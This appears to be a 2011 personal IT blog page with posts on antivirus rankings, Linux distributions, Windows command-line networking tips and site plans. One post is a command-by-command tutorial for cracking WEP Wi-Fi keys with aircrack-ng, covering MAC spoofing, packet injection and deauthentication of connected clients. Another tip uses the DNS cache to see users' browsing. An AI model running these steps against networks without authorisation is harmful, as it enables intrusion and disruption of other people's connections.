XeoShift

Changing how ITs done

Home

Welcome to XeoShift, a site dedicated to help IT guys & tech savvy users get the most out their PCs.

view:  full / summary

Antivirus Breakdown

Posted by Sean McCall on July 27, 2011 at 9:09 AM Comments comments (0)

Best:

  • Kaspersky       64.95 1 Year 3 PCs
  • BitDefender    59.95 1 Year 3 PCs
  • F-Secure        59.99 1 Year 3 PCs

Better:

  • Panda             59.99 1 Year 1 PC
  • Symantec        49.99 1 Year 3 PCs
  • G Data            34.95 1 Year 1 PC

Good:

  • AVG                 54.99 1 Year 1 PC
  • Sophos           136.50 1 Year 3 PCs*
  • Avast               39.99 1 Year 1 PC
  • TrustPort*        54.95 1 Year 1 PC
  • eScan*            45.95 1 Year 1 PC
  • ESET*             59.99 1 Year 1 PC
  • TrendMicro*    34.95 1 Year 3 PCs

Average:

  • Webroot*          79.95 1 Year 3 PCs
  • PC Tools*         49.99 1 Year 3 PCs
  • Avira*               49.99 1 Year 1 PC
  • Microsoft*        Free
  • K7*                  49.96 1 Year 1 PC
  • McAfee*           39.99 1 Year 3 PCs
  • Comodo*         39.99 1 Year 3 PCs*

*Difficult to interpret data

I used AV-TEST & AV-Comparatives for this breakdown. It took a while to merge there data, but I managed to come up with a method to the madness for future reference:

  • AV-Test Protection: +5.25
  • AV-Comparatives Compromised: -2.0%
  • AV-Comparatives Blocked: +97%
  • AV-Test Repair: +4.75
  • AV-Test Usablity: +4.5
  • AV-Comparatives User Dependent: Divide by 2 & add half to Blocked & half to Compromised

Using this as minimum requirements for software, very few can be called Best or Better. As you can see though, the only free software in this list is from Microsoft, and it's in the Average section, which could be called the Average/Bad section. 2 obvious "rip-offs" exist, quote Sophos & Webroot. Sophos is mostly intended for business use though, thus why such a small lincense costs so much. Kaspersky really took the charge with this one though, it's worth that extra $5 if one cares to invest. If one is looking for a deal, G Data has you covered there. And now, if you're like me, and perfer free, you may have noticed already that many of the above offer free versions. Use this as a baseline for what they can really do.


"Worst Quarter in History for Malware Infections"

Posted by Sean McCall on July 11, 2011 at 10:01 AM Comments comments (0)

After viewing a few statistics from around the web, I came up with this pie chart to break down which malware infection methods have had the largest effect during this outbreak. Obviously Trojans have the majority. The simplest ways to avoid Trojans is not downloading from untrusted sources on the web, email or P2P, etc. Secondly, be sure to have an up-to-date antivirus with active file protection, meaning it is always scanning new files. This is one of the main factors of antivirus software that can slow your computer down. Most decent antivirus can be set to only scan certain areas, like your Downloads & Temporary folders. This opens holes in your security, but in the end, most of the time it comes down to balancing performance with security to provide the best user experience.

Old Linux Top Ten List

Posted by Sean McCall on July 5, 2011 at 4:34 PM Comments comments (0)

TOP 5 (6):

  Ubuntu

  openSUSE

  Fedora/Mint

  Debian

  Mandriva

 

TOP 10 (13)

  PCLinuxOS*

  Puppy*

  Sabayon/Arch^

  CentOS"/Slackware^

  MEPIS"

 

* = No 64-bit version

^ = CLI-based install

" = Lacking modern filesystems

Praising CLI (Command Line Interface)

Posted by Sean McCall on June 23, 2011 at 2:18 PM Comments comments (0)

Nothing beats being able to fully script exactly what you want to do, and that’s what the CLI is good for. A lot of the time it also lets you view things a GUI wouldn’t (Although should in a lot of cases). Running something via CLI usually has performance advantages as well, and unlike some GUIs (e.g. Explorer.exe) one hose up doesn’t prevent you from using everything else (e.g. A locked up file copy). One of the first things I do personally on a Windows box is force cmd.exe to open with Administrative credentials. This is both a convenience & prevents limited users from fooling around. I also like to run a .reg with the following:


Windows Registry Editor Version 5.00


[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Environment]
“Prompt”=[%computername%\%username%] $_$p$g


That way I know when I’m executing a command on my local machine or remotely. There are so many useful commands, a good handful for networking are:


getmac /S (Find out the MAC address of a remote machine)


net time /domain:domain.name.com /set (Sync system time with the DC)


ping -a ::1 (Ping & attempt to resolve host name (Using IP6 localhost since it’s super short))


pathping (Basically see where hose ups are when trying to connect to a host)


ipconfig /displaydns (See what sites users may have been going to, even if they delete there history)


arp -d (Good to run on all clients if a NIC was just switched out on a server, etc.)


nslookup
            server serverIP
            settype=SRV (Standard probe for DNS server info)


netsh wlan show networks interface=”Wireless Network Connection” mode=bssid (CLI version of nearby wireless networks, it tells a whole lot more than the GUI)

Revamping the website/everything

Posted by Sean McCall on June 22, 2011 at 3:31 PM Comments comments (0)

I've noticed this site is becoming less of a trial-run venture and more of a professional eye-sore. That being said, I want to redo just about everything or move somewhere else. Webs still meets my needs, but that might quickly change. I'd like to start recording tutorials (Perhaps with CamStudio, I'm currently tweaking with it again) on how to use the apps in the Download section & upload them to my Youtube channel, which is also in the same state as the site. I also need to recreate the Facebook Connect log-in since after deactivating my account for a week, it seems to have broken that.

Now, if I do move, I think I will be using WordPress and I'll definitely find a better way present the Downloads section so that descriptions are present. I'd very much like to use the APIs provided by Alternativeto.net to accomplish this. (I fear that's gonna be pretty difficult) I think I'd also like to use SMF forums, since they're familiar to me, but if that starts complicating a single log-in, I'll use another that will. I also might start using Ustream again since I have a new webcam, but I don't have decent internet service at the moment. (Using the neighbors) If I did, I'd come up with an episode format, have a dedicated IRC channel & upload all recordings to Youtube.

I know this all sounds fine & dandy, but it's also things I've considered before, but I didn't manage to make happen. For now everything is in the air, and the main thing that could be useful is support and/or people who'd like to join in. In a way, that'd be the easiest option for me as well. I wouldn't mind joining up with a group that has all this figured out. That wouldn't totally kill of my own pursuits, but it would fulfill some of them to a degree.

I think for now I'll try my hand at everything & record while it happens. Maybe that way others can learn from it too. That's kinda the new core idea for the site anyway, being a standby free tech support solution doesn't really sell so to speak.

How to crack WEP with BackTrack 5

Posted by Sean McCall on June 1, 2011 at 3:05 PM Comments comments (15)

1.)  Start monitor mode:

airmon-ng

        Copy down interface

airmon-ng start (interface)

        If it says "mon0" or"wifi0" is used, this is your new interface

        If it says other things are running, type "kill (PID#)" for each

 

2.)  Injection test:

aireplay-ng -9 (interface)

        The APs that send pings back can be injected

        Copy down your targets BSSID, channel & ESSID

aireplay-ng -9 -e (ESSID) -a (BSSID) (interface)

        This lets you test specifically, can beuseful for verifying hidden SSIDs or alternative BSSIDs

 

3.)  Target a specific channel:

airmon-ng start (interface) (channel)

 

4.)  Change MAC:

airmon-ng stop (interface(s)

ifconfig (interface) down

macchanger--mac (faked:mac) (interface)

        Copy down faked:mac

 

5.)  Begin packet capture:

airodump-ng -c (channel) -w (dump-name) --bssid (BSSID) (new interface)

        Keep an eye out for authenticating client’s MACs under Station

        If found & step 6 isn’t going well, go back to step 4 and use that MAC

        You may have to stop the monitoring interface & the physical one

 

6.)  Fake authentication:

*Put in second shell*

aireplay-ng -1 0 -a (BSSID) -h (faked:mac) (interface)

        Successful authentication will continually send keep-alive packets

        Using "aireplay-ng -1 6000 -o 1 -q 10 -a (BSSID) -h (faked:mac) (interface)" may help for picky routers

 

7.)  ARP replay:

*Put in third shell*

aireplay-ng -3 -b (BSSID) -h (faked:mac) (interface)


8.)  Crack WEP key:

*Put in a fourth shell*

aircrack-ng -b (BSSID) (dump-name)-01.cap

        Minimum around 10,000 to 20,000 IVs are needed to crack a 64-bit key & about 40,000 to 85,000 for 128-bit

        Try "aircrack-ng -n 64 (dump-name)*cap"every 10,000 IVs

        If you know the start of the key in hexadecimal, try running "-d #" where # is the beginning characters

        If key bytes are all numbers, try running with "-t" to assume an all numeric key

        Add -x2 to brute force the last 2 bytes

        If you reach 2,000,000, try changing the fudge factor to "-f 4" & run 30 minutes to an hour

        Retry with the fudge factor increased by4 more if that’s unsuccessful

        If key bytes all start with similar numbers, try running with "-h" to assume an all ASCII key

        Add -x if trying with very few IVs to prevent brute forcing the last 2 bytes


*    Other attack methods:

Injection attack with 2 wireless cards:

        aireplay -9 -i (receiving interface) (injecting interface)

                If fails on Attack -5, make sure the injection interface MAC matches the current card MAC

 

Deauthentication attack:

        aireplay-ng --deauth 5 -a (BSSID) -c (faked:mac) (interface)

                Can be faster than an ARP replay, but you must know an authenticated client's MAC who’s online

                This will disconnect the authenticated client, so they may be suspect

Quick Topic Ideas & Links

Posted by Sean McCall on February 4, 2011 at 12:52 PM Comments comments (0)

Router:  Wifi Channel, Security, DNS server (https://store.opendns.com/setup/router/), DNS Spoof (https://www.grc.com/dns/dns.htm)

Computer:  TCP/IP (http://www.speedguide.net/downloads.php), Sysinternals Autologon + Auto Logon & Lock (http://torch.freeweb7.com/autologon.html) - I should make a better installer/zip everything together for a simple download, etc., Services (what blackviper has wrong/what's best practice, etc.), Scheduled Tasks w/ Process Explorer + Preme, Recover from RAM, Uninstall IE Flash (http://kb2.adobe.com/cps/141/tn_14157.html), USB Boot Tutorial, New Homepage/Website Idea


Rss_feed